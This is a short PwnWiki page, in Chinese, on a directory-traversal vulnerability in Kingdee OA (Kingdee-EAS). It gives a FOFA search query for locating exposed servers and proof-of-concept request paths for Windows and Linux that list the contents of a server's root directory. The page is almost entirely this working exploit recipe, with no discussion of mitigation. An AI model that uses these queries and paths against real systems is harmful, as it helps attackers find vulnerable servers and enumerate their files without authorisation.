金蝶OA server file 目录遍历漏洞

From PwnWiki
Revision as of 09:43, 8 June 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

金蝶OA

FOFA

app="Kingdee-EAS"

POC

Windows

appmonitor/protected/selector/server_file/files?folder=C://&suffix=

Linux

appmonitor/protected/selector/server_file/files?folder=/&suffix=